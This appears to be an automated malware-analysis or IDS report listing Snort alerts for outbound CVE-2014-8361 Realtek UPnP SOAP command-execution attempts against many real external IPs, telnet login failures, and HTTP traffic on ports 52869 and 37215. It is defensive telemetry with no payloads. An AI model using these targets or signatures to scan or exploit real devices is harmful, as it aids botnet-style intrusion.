    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33666 -> 45.115.240.160:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51614
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46570 -> 45.121.83.166:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46570 -> 45.121.83.166:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.54.60:23 -> 192.168.2.23:37104
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.54.60:23 -> 192.168.2.23:37104
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54606
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54606
    Source: TrafficSnort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47782
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51642
    Source: TrafficSnort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:32834
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34466 -> 185.131.76.22:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34466 -> 185.131.76.22:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34468 -> 185.131.76.22:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47782
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47782
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38914 -> 45.195.8.204:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38914 -> 45.195.8.204:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53854 -> 185.216.249.118:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53854 -> 185.216.249.118:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54660
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54660
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51668
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35288 -> 45.195.155.138:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35288 -> 45.195.155.138:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57052 -> 45.122.136.166:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57052 -> 45.122.136.166:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54176 -> 185.71.67.249:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54176 -> 185.71.67.249:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54178 -> 185.71.67.249:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.54.60:23 -> 192.168.2.23:37188
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.54.60:23 -> 192.168.2.23:37188
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51702
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48154 -> 45.42.83.36:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48154 -> 45.42.83.36:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39102 -> 45.248.71.102:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39102 -> 45.248.71.102:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39108 -> 45.248.71.102:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36808 -> 45.121.57.70:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36808 -> 45.121.57.70:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54700
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54700
    Source: TrafficSnort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:32916
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51744
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42492 -> 45.115.230.163:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42492 -> 45.115.230.163:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42500 -> 45.115.230.163:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 182.163.50.184:23 -> 192.168.2.23:40928
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54742
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54742
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51776
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59916 -> 45.154.3.97:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59916 -> 45.154.3.97:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59582 -> 45.248.69.255:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59582 -> 45.248.69.255:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60810 -> 91.200.120.134:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59598 -> 45.248.69.255:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:32972
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49310 -> 45.42.86.91:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49310 -> 45.42.86.91:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37088 -> 45.254.24.198:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37088 -> 45.254.24.198:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43948 -> 185.131.77.190:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43948 -> 185.131.77.190:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43960 -> 185.131.77.190:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33222 -> 45.152.216.146:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33222 -> 45.152.216.146:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40054 -> 45.33.248.247:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40054 -> 45.33.248.247:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37098 -> 45.254.24.198:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33234 -> 45.152.216.146:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54780
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54780
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.54.60:23 -> 192.168.2.23:37282
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.54.60:23 -> 192.168.2.23:37282
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 61.228.109.130:23 -> 192.168.2.23:40428
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 61.228.109.130:23 -> 192.168.2.23:40428
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51852
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51886
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33028 -> 45.43.233.236:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33028 -> 45.43.233.236:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54250 -> 185.37.99.247:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54250 -> 185.37.99.247:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54256 -> 185.37.99.247:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49392 -> 45.41.82.254:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49392 -> 45.41.82.254:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:33104
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.54.60:23 -> 192.168.2.23:37422
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.54.60:23 -> 192.168.2.23:37422
    Uses known network protocols on non-standard portsShow sources
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36880 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36826 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36884 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 36826
    Source: unknownNetwork traffic detected: HTTP traffic on port 36830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 36830
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40756 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53786 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 53786
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46498 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44070 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54360 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58028 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54364 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52892 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33212 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33216 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52892 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 53420 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52892 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46228 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42296 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42300 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52892 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 36066
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 36068
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55306 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38710 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38714 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42490 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
